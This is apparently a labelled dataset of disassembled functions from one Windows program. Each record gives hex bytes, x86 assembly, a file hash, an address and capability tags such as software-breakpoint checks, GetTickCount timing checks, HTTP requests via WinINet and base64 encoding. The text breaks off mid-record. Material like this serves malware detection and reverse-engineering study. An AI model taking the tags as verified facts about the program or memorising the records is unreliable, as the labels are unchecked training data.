6aff6878c14b0064a100000000506489250000000083ec2c568bf18d44240c8b4e1c5051ff1538f64b006a008d4c2420e8047c05008b86d00000008d54241c505052c744244400000000e871f7ffff8b464c8b4e4883c06483c40c83c164894424088d442404894c2404508d4c2420e8f37a05008b4c24048b4424148b54240c2bc803cab889888888f7e903d16a01c1fa048bcac1e91f8d440a0133d285c00f9cc24a8bce23c2506a006a00e8744305008b4c24108b4424188b5424082bc803cab889888888f7e903d133c9c1fa048bc26a01c1e81f8d44020185c00f9cc14923c18bce506a006a01e8374305006a016a006a008bcee8d24205006a016a006a018bcee8c54205008d4c241cc7442438ffffffffe8927b05008b4c24305e64890d0000000083c438c3
|
[
"push 0xffffffffffffffff",
"push 0x4bc178",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x2c",
"push esi",
"mov esi, ecx",
"lea eax, [esp + 0xc]",
"mov ecx, dword [esi + 0x1c]",
"push eax",
"push ecx",
"call dword [sym.imp.USER32.dll_GetClientRect]",
"push 0",
"lea ecx, [esp + 0x20]",
"call fcn.004b3499",
"mov eax, dword [esi + 0xd0]",
"lea edx, [esp + 0x1c]",
"push eax",
"push eax",
"push edx",
"mov dword [esp + 0x44], 0",
"call fcn.0045b020",
"mov eax, dword [esi + 0x4c]",
"mov ecx, dword [esi + 0x48]",
"add eax, 0x64",
"add esp, 0xc",
"add ecx, 0x64",
"mov dword [esp + 8], eax",
"lea eax, [esp + 4]",
"mov dword [esp + 4], ecx",
"push eax",
"lea ecx, [esp + 0x20]",
"call fcn.004b33c7",
"mov ecx, dword [esp + 4]",
"mov eax, dword [esp + 0x14]",
"mov edx, dword [esp + 0xc]",
"sub ecx, eax",
"add ecx, edx",
"mov eax, 0x88888889",
"imul ecx",
"add edx, ecx",
"push 1",
"sar edx, 4",
"mov ecx, edx",
"shr ecx, 0x1f",
"lea eax, [edx + ecx + 1]",
"xor edx, edx",
"test eax, eax",
"setl dl",
"dec edx",
"mov ecx, esi",
"and eax, edx",
"push eax",
"push 0",
"push 0",
"call fcn.004afc85",
"mov ecx, dword [esp + 0x10]",
"mov eax, dword [esp + 0x18]",
"mov edx, dword [esp + 8]",
"sub ecx, eax",
"add ecx, edx",
"mov eax, 0x88888889",
"imul ecx",
"add edx, ecx",
"xor ecx, ecx",
"sar edx, 4",
"mov eax, edx",
"push 1",
"shr eax, 0x1f",
"lea eax, [edx + eax + 1]",
"test eax, eax",
"setl cl",
"dec ecx",
"and eax, ecx",
"mov ecx, esi",
"push eax",
"push 0",
"push 1",
"call fcn.004afc85",
"push 1",
"push 0",
"push 0",
"mov ecx, esi",
"call fcn.004afc2d",
"push 1",
"push 0",
"push 1",
"mov ecx, esi",
"call fcn.004afc2d",
"lea ecx, [esp + 0x1c]",
"mov dword [esp + 0x38], 0xffffffff",
"call fcn.004b350b",
"mov ecx, dword [esp + 0x30]",
"pop esi",
"mov dword fs:[0], ecx",
"add esp, 0x38",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x45b9e0
|
[
"Get number of processors"
] |
6aff6898c14b0064a100000000506489250000000083ec2c568bf16a008d4c2420e8937a050068e80300008d44242068e803000050c744244400000000e8fef5ffff8b4e488b464c83c16483c40c894c24048d4c24040596000000518d4c24208944240ce87e7905008b461c8d54240c5250ff1538f64b008b4424188b5424102bc28d04808d04808d0480c1e00399f77c24088b54240c8bc88b4424142bc28d04808d04808d0480c1e00399f77c2404837c244401750d837c24400175043bc87d028bc13dc80000007d05b8c80000008bce8986d0000000e8a3fdffff8b4e1c6a016a0051ff1534f64b008d4c241cc7442438ffffffffe82f7a05008b4c24305e64890d0000000083c438c20800
|
[
"push 0xffffffffffffffff",
"push 0x4bc198",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x2c",
"push esi",
"mov esi, ecx",
"push 0",
"lea ecx, [esp + 0x20]",
"call fcn.004b3499",
"push 0x3e8",
"lea eax, [esp + 0x20]",
"push 0x3e8",
"push eax",
"mov dword [esp + 0x44], 0",
"call fcn.0045b020",
"mov ecx, dword [esi + 0x48]",
"mov eax, dword [esi + 0x4c]",
"add ecx, 0x64",
"add esp, 0xc",
"mov dword [esp + 4], ecx",
"lea ecx, [esp + 4]",
"add eax, 0x96",
"push ecx",
"lea ecx, [esp + 0x20]",
"mov dword [esp + 0xc], eax",
"call fcn.004b33c7",
"mov eax, dword [esi + 0x1c]",
"lea edx, [esp + 0xc]",
"push edx",
"push eax",
"call dword [sym.imp.USER32.dll_GetClientRect]",
"mov eax, dword [esp + 0x18]",
"mov edx, dword [esp + 0x10]",
"sub eax, edx",
"lea eax, [eax + eax*4]",
"lea eax, [eax + eax*4]",
"lea eax, [eax + eax*4]",
"shl eax, 3",
"cdq",
"idiv dword [esp + 8]",
"mov edx, dword [esp + 0xc]",
"mov ecx, eax",
"mov eax, dword [esp + 0x14]",
"sub eax, edx",
"lea eax, [eax + eax*4]",
"lea eax, [eax + eax*4]",
"lea eax, [eax + eax*4]",
"shl eax, 3",
"cdq",
"idiv dword [esp + 4]",
"cmp dword [esp + 0x44], 1",
"jne 0x45baa4",
"cmp dword [esp + 0x40], 1",
"jne 0x45baa2",
"cmp ecx, eax",
"jge 0x45baa4",
"mov eax, ecx",
"cmp eax, 0xc8",
"jge 0x45bab0",
"mov eax, 0xc8",
"mov ecx, esi",
"mov dword [esi + 0xd0], eax",
"call fcn.0045b860",
"mov ecx, dword [esi + 0x1c]",
"push 1",
"push 0",
"push ecx",
"call dword [sym.imp.USER32.dll_InvalidateRect]",
"lea ecx, [esp + 0x1c]",
"mov dword [esp + 0x38], 0xffffffff",
"call fcn.004b350b",
"mov ecx, dword [esp + 0x30]",
"pop esi",
"mov dword fs:[0], ecx",
"add esp, 0x38",
"ret 8"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x45c400
|
[
"Access peb ldr_data",
"Get number of processors"
] |
6aff6803c24b0064a10000000050648925000000005155568bf1578974240ce87e1c05008d7e64c744241800000000c7470400000000c707f8394e008b44242c8b6c24248b4c243089463c8bc5c706000e4e00894e40c74644000000008b088d5648c644241801890a8b4804894a048b4808894a088b400c8b4c244089420c8b44244450894e5c894660ff1584f04b00508bcfe8a97205008b5424288b44242052505568440080508bcee81388050085c074698b4c243ce8b27205008b4e1c8b2d58f64b006a00506a3051894658ffd58b7c243485ff7408578bcee8ef4805008bcee899010000837c243801752783c9ff33c0f2ae8b561c6afff7d1495168b100000052ffd58b461c6a006a0068b700000050ffd58bcee8ee4905008b4c24108bc65f5e5d64890d0000000083c410c22800
|
[
"push 0xffffffffffffffff",
"push 0x4bc203",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"push ecx",
"push ebp",
"push esi",
"mov esi, ecx",
"push edi",
"mov dword [esp + 0xc], esi",
"call fcn.004ae0a2",
"lea edi, [esi + 0x64]",
"mov dword [esp + 0x18], 0",
"mov dword [edi + 4], 0",
"mov dword [edi], vtable.CBrush.0",
"mov eax, dword [esp + 0x2c]",
"mov ebp, dword [esp + 0x24]",
"mov ecx, dword [esp + 0x30]",
"mov dword [esi + 0x3c], eax",
"mov eax, ebp",
"mov dword [esi], method.CEdit.virtual_0",
"mov dword [esi + 0x40], ecx",
"mov dword [esi + 0x44], 0",
"mov ecx, dword [eax]",
"lea edx, [esi + 0x48]",
"mov byte [esp + 0x18], 1",
"mov dword [edx], ecx",
"mov ecx, dword [eax + 4]",
"mov dword [edx + 4], ecx",
"mov ecx, dword [eax + 8]",
"mov dword [edx + 8], ecx",
"mov eax, dword [eax + 0xc]",
"mov ecx, dword [esp + 0x40]",
"mov dword [edx + 0xc], eax",
"mov eax, dword [esp + 0x44]",
"push eax",
"mov dword [esi + 0x5c], ecx",
"mov dword [esi + 0x60], eax",
"call dword [sym.imp.GDI32.dll_CreateSolidBrush]",
"push eax",
"mov ecx, edi",
"call fcn.004b3741",
"mov edx, dword [esp + 0x28]",
"mov eax, dword [esp + 0x20]",
"push edx",
"push eax",
"push ebp",
"push 0x50800044",
"mov ecx, esi",
"call fcn.004b4cc2",
"test eax, eax",
"je 0x45c51c",
"mov ecx, dword [esp + 0x3c]",
"call fcn.004b376e",
"mov ecx, dword [esi + 0x1c]",
"mov ebp, dword [sym.imp.USER32.dll_SendMessageA]",
"push 0",
"push eax",
"push 0x30",
"push ecx",
"mov dword [esi + 0x58], eax",
"call ebp",
"mov edi, dword [esp + 0x34]",
"test edi, edi",
"je 0x45c4e0",
"push edi",
"mov ecx, esi",
"call fcn.004b0dcf",
"mov ecx, esi",
"call fcn.0045c680",
"cmp dword [esp + 0x38], 1",
"jne 0x45c515",
"or ecx, 0xffffffff",
"xor eax, eax",
"repne scasb al, byte es:[edi]",
"mov edx, dword [esi + 0x1c]",
"push 0xffffffffffffffff",
"not ecx",
"dec ecx",
"push ecx",
"push 0xb1",
"push edx",
"call ebp",
"mov eax, dword [esi + 0x1c]",
"push 0",
"push 0",
"push 0xb7",
"push eax",
"call ebp",
"mov ecx, esi",
"call fcn.004b0f0a",
"mov ecx, dword [esp + 0x10]",
"mov eax, esi",
"pop edi",
"pop esi",
"pop ebp",
"mov dword fs:[0], ecx",
"add esp, 0x10",
"ret 0x28"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x45ef40
|
[
"Check for software breakpoints"
] |
568b742408817e10ca000000752556e8fc3000008b464083c40485c0740ec74610cf000000b8010000005ec3c74610cb0000008b46103dcb000000757c8b86b00100008b481085c974588b460885c0740656ff1083c4048b8eb001000056ff1183c40485c0743783f80274368b4e0885c974d783f803740583f80175cd8b4104408941048b46088b48088b50043bd17cb98b963c01000003d1895008ebac33c05ec38b869000000056898698000000e82c00000083c4045ec33dcc00000074088b0e56ff1183c40456e81200000083c4045ec3
|
[
"push esi",
"mov esi, dword [esp + 8]",
"cmp dword [esi + 0x10], 0xca",
"jne 0x45ef73",
"push esi",
"call fcn.00462050",
"mov eax, dword [esi + 0x40]",
"add esp, 4",
"test eax, eax",
"je 0x45ef6c",
"mov dword [esi + 0x10], 0xcf",
"mov eax, 1",
"pop esi",
"ret",
"mov dword [esi + 0x10], 0xcb",
"mov eax, dword [esi + 0x10]",
"cmp eax, 0xcb",
"jne 0x45eff9",
"mov eax, dword [esi + 0x1b0]",
"mov ecx, dword [eax + 0x10]",
"test ecx, ecx",
"je 0x45efe2",
"mov eax, dword [esi + 8]",
"test eax, eax",
"je 0x45ef97",
"push esi",
"call dword [eax]",
"add esp, 4",
"mov ecx, dword [esi + 0x1b0]",
"push esi",
"call dword [ecx]",
"add esp, 4",
"test eax, eax",
"je 0x45efde",
"cmp eax, 2",
"je 0x45efe2",
"mov ecx, dword [esi + 8]",
"test ecx, ecx",
"je 0x45ef8a",
"cmp eax, 3",
"je 0x45efbd",
"cmp eax, 1",
"jne 0x45ef8a",
"mov eax, dword [ecx + 4]",
"inc eax",
"mov dword [ecx + 4], eax",
"mov eax, dword [esi + 8]",
"mov ecx, dword [eax + 8]",
"mov edx, dword [eax + 4]",
"cmp edx, ecx",
"jl 0x45ef8a",
"mov edx, dword [esi + 0x13c]",
"add edx, ecx",
"mov dword [eax + 8], edx",
"jmp 0x45ef8a",
"xor eax, eax",
"pop esi",
"ret",
"mov eax, dword [esi + 0x90]",
"push esi",
"mov dword [esi + 0x98], eax",
"call fcn.0045f020",
"add esp, 4",
"pop esi",
"ret",
"cmp eax, 0xcc",
"je 0x45f008",
"mov ecx, dword [esi]",
"push esi",
"call dword [ecx]",
"add esp, 4",
"push esi",
"call fcn.0045f020",
"add esp, 4",
"pop esi",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x46a3c0
|
[
"Check for time delay via gettickcount"
] |
81eca000000053558bac24ac000000565755e88fda01008b35c8f34b00b92800000033c08d7c2410f3abc7442410a0000000ffd68bf8ffd62bc73db80b000073258b1d90f34b008d4424105055e84eda010083f806740f6a00ffd3ffd62bc73db80b000072e15f5e5d5b81c4a0000000c3
|
[
"sub esp, 0xa0",
"push ebx",
"push ebp",
"mov ebp, dword [esp + 0xac]",
"push esi",
"push edi",
"push ebp",
"call sub.RASAPI32.dll_RasHangUpA",
"mov esi, dword [sym.imp.KERNEL32.dll_GetTickCount]",
"mov ecx, 0x28",
"xor eax, eax",
"lea edi, [esp + 0x10]",
"rep stosd dword es:[edi], eax",
"mov dword [esp + 0x10], 0xa0",
"call esi",
"mov edi, eax",
"call esi",
"sub eax, edi",
"cmp eax, 0xbb8",
"jae 0x46a426",
"mov ebx, dword [sym.imp.KERNEL32.dll_Sleep]",
"lea eax, [esp + 0x10]",
"push eax",
"push ebp",
"call sub.RASAPI32.dll_RasGetConnectStatusA",
"cmp eax, 6",
"je 0x46a426",
"push 0",
"call ebx",
"call esi",
"sub eax, edi",
"cmp eax, 0xbb8",
"jb 0x46a407",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"add esp, 0xa0",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x46abb0
|
[
"Create http request"
] |
568bf1833e0075308b560433c06a006a008b4af885c90f95c08bc8f7d91bc923caf7d81bc05183e002405068dcf34f00ff15ccf64b0089068b0e33c085c90f95c05ec3
|
[
"push esi",
"mov esi, ecx",
"cmp dword [esi], 0",
"jne 0x46abe8",
"mov edx, dword [esi + 4]",
"xor eax, eax",
"push 0",
"push 0",
"mov ecx, dword [edx - 8]",
"test ecx, ecx",
"setne al",
"mov ecx, eax",
"neg ecx",
"sbb ecx, ecx",
"and ecx, edx",
"neg eax",
"sbb eax, eax",
"push ecx",
"and eax, 2",
"inc eax",
"push eax",
"push str.Mozilla_4.0__compatible__MSIE_6.0__Windows_NT_5.0_",
"call dword [sym.imp.WININET.dll_InternetOpenA]",
"mov dword [esi], eax",
"mov ecx, dword [esi]",
"xor eax, eax",
"test ecx, ecx",
"setne al",
"pop esi",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x46acd0
|
[
"Connect to http server",
"Read data from internet",
"Receive data",
"Send data",
"Send http request"
] |
558bec6aff6820c64b0064a100000000506489250000000081ec800000008b450c53568b75085733ff3bf78965f08bd98978100f84df030000803e000f84d60300008d4da8897dd4897dcc897dc8e863230400a1cc625000897dfc8945e08945088945e48945e8568d4decc645fc05e81e1e04008d4dd0685cf44f00518d4decc645fc06e8b5f103008d4dd0e8931d04008d55e868000000208d45e4528d4dc4508d5508518d45e0528b55ec8d4dd8505152e8faae04003bc7742a8b45d8c745d0000000843d0b100000750ec745d803000000c745d0000080848bcbe8fffdffff85c0755e8d4decc645fc05e8331d04008d4de8c645fc04e8271d04008d4de4c645fc03e81b1d04008d4d08c645fc02e80f1d04008d4de0c645fc01e8031d0400c745fcffffffffe8c72204008b45c88b4df464890d000000005f5e5b8be55dc208008b45d88b4de88b55e45757508b45c4518b4de0528b13505152ff15c0f64b008bf03bf78975d4754d8d4decc645fc05e8ad1c04008d4de8c645fc04e8a11c04008d4de4c645fc03e8951c04008d4d08c645fc02e8891c04008d4de0c645fc01e87d1c0400c745fcffffffffe841220400e93f020000568bcbe8b0fdffff8d45c0685cf44f00508d4d08e86df00300508d4d08c645fc07e8331d04008d4dc0c645fc06e83a1c04008b4dd08b4508578d55b05152576850f44f0050684cf44f0056c745b03cf44f00897db4ff15d4f64b008bd83bdf895dcc754d8d4decc645fc05e8fc1b04008d4de8c645fc04e8f01b04008d4de4c645fc03e8e41b04008d4d08c645fc02e8d81b04008d4de0c645fc01e8cc1b0400c745fcffffffffe890210400e9830100005757bf2cf44f0083c9ff33c0f2aef7d14951682cf44f0053ff15d0f64b0085c0754f8d4decc645fc05e88d1b04008d4de8c645fc04e8811b04008d4de4c645fc03e8751b04008d4d08c645fc02e8691b04008d4de0c645fc01e85d1b0400c745fcffffffffe82121040033ffe9120100008d4ddc6a008d9574ffffff51526a0553c745dc20000000ff15b4f64b0085c074298d8574ffffff50e816e9010083c40485c07e16403d009001007609c745dc00900100eb0c8945dceb07c745dc002800008d4d94e80d0100008b4ddcc645fc08518d4d94e81d0100008bf085f675518d4d94c645fc06c7459498164e00e8e40200008d4decc645fc05e8bc1a04008d4de8c645fc04e8b01a04008d4de4c645fc03e8a41a04008d4d08c645fc02e8981a04008d4de0c645fc01e88c1a0400eb418b3db0f64b008b45dc8d55bc52505653ffd785c074998b45bc85c07509c745c801000000eb898b4d0c5056e806030000ebd4c745fcffffffffe80d2004008b75d433ff3bdf740753ff15c8f64b003bf7740756ff15c8f64b008b45c88b4df464890d000000005f5e5b8be55dc208008b4df45f5e33c064890d000000005b8be55dc20800
|
[
"push ebp",
"mov ebp, esp",
"push 0xffffffffffffffff",
"push 0x4bc620",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x80",
"mov eax, dword [ebp + 0xc]",
"push ebx",
"push esi",
"mov esi, dword [ebp + 8]",
"push edi",
"xor edi, edi",
"cmp esi, edi",
"mov dword [ebp - 0x10], esp",
"mov ebx, ecx",
"mov dword [eax + 0x10], edi",
"je 0x46b0e8",
"cmp byte [esi], 0",
"je 0x46b0e8",
"lea ecx, [ebp - 0x58]",
"mov dword [ebp - 0x2c], edi",
"mov dword [ebp - 0x34], edi",
"mov dword [ebp - 0x38], edi",
"call fcn.004ad086",
"mov eax, dword [0x5062cc]",
"mov dword [ebp - 4], edi",
"mov dword [ebp - 0x20], eax",
"mov dword [ebp + 8], eax",
"mov dword [ebp - 0x1c], eax",
"mov dword [ebp - 0x18], eax",
"push esi",
"lea ecx, [ebp - 0x14]",
"mov byte [ebp - 4], 5",
"call fcn.004acb62",
"lea ecx, [ebp - 0x30]",
"push 0x4ff45c",
"push ecx",
"lea ecx, [ebp - 0x14]",
"mov byte [ebp - 4], 6",
"call fcn.004a9f0e",
"lea ecx, [ebp - 0x30]",
"call fcn.004acaf4",
"lea edx, [ebp - 0x18]",
"push 0x20000000",
"lea eax, [ebp - 0x1c]",
"push edx",
"lea ecx, [ebp - 0x3c]",
"push eax",
"lea edx, [ebp + 8]",
"push ecx",
"lea eax, [ebp - 0x20]",
"push edx",
"mov edx, dword [ebp - 0x14]",
"lea ecx, [ebp - 0x28]",
"push eax",
"push ecx",
"push edx",
"call fcn.004b5c81",
"cmp eax, edi",
"je 0x46adb5",
"mov eax, dword [ebp - 0x28]",
"mov dword [ebp - 0x30], 0x84000000",
"cmp eax, 0x100b",
"jne 0x46adaa",
"mov dword [ebp - 0x28], 3",
"mov dword [ebp - 0x30], 0x84800000",
"mov ecx, ebx",
"call fcn.0046abb0",
"test eax, eax",
"jne 0x46ae13",
"lea ecx, [ebp - 0x14]",
"mov byte [ebp - 4], 5",
"call fcn.004acaf4",
"lea ecx, [ebp - 0x18]",
"mov byte [ebp - 4], 4",
"call fcn.004acaf4",
"lea ecx, [ebp - 0x1c]",
"mov byte [ebp - 4], 3",
"call fcn.004acaf4",
"lea ecx, [ebp + 8]",
"mov byte [ebp - 4], 2",
"call fcn.004acaf4",
"lea ecx, [ebp - 0x20]",
"mov byte [ebp - 4], 1",
"call fcn.004acaf4",
"mov dword [ebp - 4], 0xffffffff",
"call fcn.004ad0c4",
"mov eax, dword [ebp - 0x38]",
"mov ecx, dword [ebp - 0xc]",
"mov dword fs:[0], ecx",
"pop edi",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret 8",
"mov eax, dword [ebp - 0x28]",
"mov ecx, dword [ebp - 0x18]",
"mov edx, dword [ebp - 0x1c]",
"push edi",
"push edi",
"push eax",
"mov eax, dword [ebp - 0x3c]",
"push ecx",
"mov ecx, dword [ebp - 0x20]",
"push edx",
"mov edx, dword [ebx]",
"push eax",
"push ecx",
"push edx",
"call dword [sym.imp.WININET.dll_InternetConnectA]",
"mov esi, eax",
"cmp esi, edi",
"mov dword [ebp - 0x2c], esi",
"jne 0x46ae88",
"lea ecx, [ebp - 0x14]",
"mov byte [ebp - 4], 5",
"call fcn.004acaf4",
"lea ecx, [ebp - 0x18]",
"mov byte [ebp - 4], 4",
"call fcn.004acaf4",
"lea ecx, [ebp - 0x1c]",
"mov byte [ebp - 4], 3",
"call fcn.004acaf4",
"lea ecx, [ebp + 8]",
"mov byte [ebp - 4], 2",
"call fcn.004acaf4",
"lea ecx, [ebp - 0x20]",
"mov byte [ebp - 4], 1",
"call fcn.004acaf4",
"mov dword [ebp - 4], 0xffffffff",
"call fcn.004ad0c4",
"jmp 0x46b0c7",
"push esi",
"mov ecx, ebx",
"call fcn.0046ac40",
"lea eax, [ebp - 0x40]",
"push 0x4ff45c",
"push eax",
"lea ecx, [ebp + 8]",
"call fcn.004a9f0e",
"push eax",
"lea ecx, [ebp + 8]",
"mov byte [ebp - 4], 7",
"call fcn.004acbe1",
"lea ecx, [ebp - 0x40]",
"mov byte [ebp - 4], 6",
"call fcn.004acaf4",
"mov ecx, dword [ebp - 0x30]",
"mov eax, dword [ebp + 8]",
"push edi",
"lea edx, [ebp - 0x50]",
"push ecx",
"push edx",
"push edi",
"push str.HTTP_1.0",
"push eax",
"push 0x4ff44c",
"push esi",
"mov dword [ebp - 0x50], str.Accept:____r_n",
"mov dword [ebp - 0x4c], edi",
"call dword [sym.imp.WININET.dll_HttpOpenRequestA]",
"mov ebx, eax",
"cmp ebx, edi",
"mov dword [ebp - 0x34], ebx",
"jne 0x46af39",
"lea ecx, [ebp - 0x14]",
"mov byte [ebp - 4], 5",
"call fcn.004acaf4",
"lea ecx, [ebp - 0x18]",
"mov byte [ebp - 4], 4",
"call fcn.004acaf4",
"lea ecx, [ebp - 0x1c]",
"mov byte [ebp - 4], 3",
"call fcn.004acaf4",
"lea ecx, [ebp + 8]",
"mov byte [ebp - 4], 2",
"call fcn.004acaf4",
"lea ecx, [ebp - 0x20]",
"mov byte [ebp - 4], 1",
"call fcn.004acaf4",
"mov dword [ebp - 4], 0xffffffff",
"call fcn.004ad0c4",
"jmp 0x46b0bc",
"push edi",
"push edi",
"mov edi, str.Accept:___r_n_r_n",
"or ecx, 0xffffffff",
"xor eax, eax",
"repne scasb al, byte es:[edi]",
"not ecx",
"dec ecx",
"push ecx",
"push str.Accept:___r_n_r_n",
"push ebx",
"call dword [sym.imp.WININET.dll_HttpSendRequestA]",
"test eax, eax",
"jne 0x46afaa",
"lea ecx, [ebp - 0x14]",
"mov byte [ebp - 4], 5",
"call fcn.004acaf4",
"lea ecx, [ebp - 0x18]",
"mov byte [ebp - 4], 4",
"call fcn.004acaf4",
"lea ecx, [ebp - 0x1c]",
"mov byte [ebp - 4], 3",
"call fcn.004acaf4",
"lea ecx, [ebp + 8]",
"mov byte [ebp - 4], 2",
"call fcn.004acaf4",
"lea ecx, [ebp - 0x20]",
"mov byte [ebp - 4], 1",
"call fcn.004acaf4",
"mov dword [ebp - 4], 0xffffffff",
"call fcn.004ad0c4",
"xor edi, edi",
"jmp 0x46b0bc",
"lea ecx, [ebp - 0x24]",
"push 0",
"lea edx, [ebp - 0x8c]",
"push ecx",
"push edx",
"push 5",
"push ebx",
"mov dword [ebp - 0x24], 0x20",
"call dword [sym.imp.WININET.dll_HttpQueryInfoA]",
"test eax, eax",
"je 0x46aff4",
"lea eax, [ebp - 0x8c]",
"push eax",
"call fcn.004898ed",
"add esp, 4",
"test eax, eax",
"jle 0x46aff4",
"inc eax",
"cmp eax, 0x19000",
"jbe 0x46afef",
"mov dword [ebp - 0x24], 0x19000",
"jmp 0x46affb",
"mov dword [ebp - 0x24], eax",
"jmp 0x46affb",
"mov dword [ebp - 0x24], 0x2800",
"lea ecx, [ebp - 0x6c]",
"call fcn.0046b110",
"mov ecx, dword [ebp - 0x24]",
"mov byte [ebp - 4], 8",
"push ecx",
"lea ecx, [ebp - 0x6c]",
"call fcn.0046b130",
"mov esi, eax",
"test esi, esi",
"jne 0x46b06a",
"lea ecx, [ebp - 0x6c]",
"mov byte [ebp - 4], 6",
"mov dword [ebp - 0x6c], 0x4e1698",
"call fcn.0046b310",
"lea ecx, [ebp - 0x14]",
"mov byte [ebp - 4], 5",
"call fcn.004acaf4",
"lea ecx, [ebp - 0x18]",
"mov byte [ebp - 4], 4",
"call fcn.004acaf4",
"lea ecx, [ebp - 0x1c]",
"mov byte [ebp - 4], 3",
"call fcn.004acaf4",
"lea ecx, [ebp + 8]",
"mov byte [ebp - 4], 2",
"call fcn.004acaf4",
"lea ecx, [ebp - 0x20]",
"mov byte [ebp - 4], 1",
"call fcn.004acaf4",
"jmp 0x46b0ab",
"mov edi, dword [sym.imp.WININET.dll_InternetReadFile]",
"mov eax, dword [ebp - 0x24]",
"lea edx, [ebp - 0x44]",
"push edx",
"push eax",
"push esi",
"push ebx",
"call edi",
"test eax, eax",
"je 0x46b019",
"mov eax, dword [ebp - 0x44]",
"test eax, eax",
"jne 0x46b090",
"mov dword [ebp - 0x38], 1",
"jmp 0x46b019",
"mov ecx, dword [ebp + 0xc]",
"push eax",
"push esi",
"call fcn.0046b3a0",
"jmp 0x46b070",
"mov dword [ebp - 4], 0xffffffff",
"call fcn.004ad0c4",
"mov esi, dword [ebp - 0x2c]",
"xor edi, edi",
"cmp ebx, edi",
"je 0x46b0c7",
"push ebx",
"call dword [sym.imp.WININET.dll_InternetCloseHandle]",
"cmp esi, edi",
"je 0x46b0d2",
"push esi",
"call dword [sym.imp.WININET.dll_InternetCloseHandle]",
"mov eax, dword [ebp - 0x38]",
"mov ecx, dword [ebp - 0xc]",
"mov dword fs:[0], ecx",
"pop edi",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret 8",
"mov ecx, dword [ebp - 0xc]",
"pop edi",
"pop esi",
"xor eax, eax",
"mov dword fs:[0], ecx",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret 8"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x46b560
|
[
"Encode data using base64"
] |
83ec4c53558b6c245c5657b910000000be90f44f008d7c2418f3a58d4d02b856555555f7e98bc283c9ffc1e81fa403d0bf8cf44f0033c0c1e202f2aef7d18bf2490fafceb8cb6b28aff7e12bcad1e903cac1e9068d4c0e0351e8771204008bf0b856555555f7ed8b5c24648bc2c1e81f33c903d083c40433ff3bd1894c24100f8eba00000089542414eb048b5c246033c033d28a041f8a541f01478bea4733d28a141f8bd8c1fb0283e33f83e003c1e0048a5c1c1847881c318bddc1fb0483e30f410bd883e50fc1e5028a441c188804318bc2c1f80683e003410bc583e23f418a4404188a541418884431ff8b44246c8814318b5424104183c20485c08954241074258bc283f8497c1ea08cf44f00880431a08df44f004184c0740488043141c7442410000000008b44241448894424140f8554ffffff8b6c24648b5c24608bc5bd0300000099f7fd83ea000f84950000004a74474a0f85a900000033d233c08a141f8a441f018beac1fa0283e23f83e503c1e5048a5414188814318bd0c1fa0483e20f410bd54183e00f8a5414188a448418885431ff880431eb2833c08a041f8bd083e003c1fa0283e23f41c1e0048a5414188a440418885431ff88043141c604313d8b44246c41c604313d4185c074338a158cf44f00881431a08df44f004184c07420eb1a8b44246c85c07416a08cf44f00880431a08df44f004184c07404880431418b542468c60431008bc65f5e5d890a5b83c44cc3
|
[
"sub esp, 0x4c",
"push ebx",
"push ebp",
"mov ebp, dword [esp + 0x5c]",
"push esi",
"push edi",
"mov ecx, 0x10",
"mov esi, str.ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_",
"lea edi, [esp + 0x18]",
"rep movsd dword es:[edi], dword [esi]",
"lea ecx, [ebp + 2]",
"mov eax, 0x55555556",
"imul ecx",
"mov eax, edx",
"or ecx, 0xffffffff",
"shr eax, 0x1f",
"movsb byte es:[edi], byte [esi]",
"add edx, eax",
"mov edi, 0x4ff48c",
"xor eax, eax",
"shl edx, 2",
"repne scasb al, byte es:[edi]",
"not ecx",
"mov esi, edx",
"dec ecx",
"imul ecx, esi",
"mov eax, 0xaf286bcb",
"mul ecx",
"sub ecx, edx",
"shr ecx, 1",
"add ecx, edx",
"shr ecx, 6",
"lea ecx, [esi + ecx + 3]",
"push ecx",
"call fcn.004ac835",
"mov esi, eax",
"mov eax, 0x55555556",
"imul ebp",
"mov ebx, dword [esp + 0x64]",
"mov eax, edx",
"shr eax, 0x1f",
"xor ecx, ecx",
"add edx, eax",
"add esp, 4",
"xor edi, edi",
"cmp edx, ecx",
"mov dword [esp + 0x10], ecx",
"jle 0x46b69f",
"mov dword [esp + 0x14], edx",
"jmp 0x46b5ef",
"mov ebx, dword [esp + 0x60]",
"xor eax, eax",
"xor edx, edx",
"mov al, byte [edi + ebx]",
"mov dl, byte [edi + ebx + 1]",
"inc edi",
"mov ebp, edx",
"inc edi",
"xor edx, edx",
"mov dl, byte [edi + ebx]",
"mov ebx, eax",
"sar ebx, 2",
"and ebx, 0x3f",
"and eax, 3",
"shl eax, 4",
"mov bl, byte [esp + ebx + 0x18]",
"inc edi",
"mov byte [ecx + esi], bl",
"mov ebx, ebp",
"sar ebx, 4",
"and ebx, 0xf",
"inc ecx",
"or ebx, eax",
"and ebp, 0xf",
"shl ebp, 2",
"mov al, byte [esp + ebx + 0x18]",
"mov byte [ecx + esi], al",
"mov eax, edx",
"sar eax, 6",
"and eax, 3",
"inc ecx",
"or eax, ebp",
"and edx, 0x3f",
"inc ecx",
"mov al, byte [esp + eax + 0x18]",
"mov dl, byte [esp + edx + 0x18]",
"mov byte [ecx + esi - 1], al",
"mov eax, dword [esp + 0x6c]",
"mov byte [ecx + esi], dl",
"mov edx, dword [esp + 0x10]",
"inc ecx",
"add edx, 4",
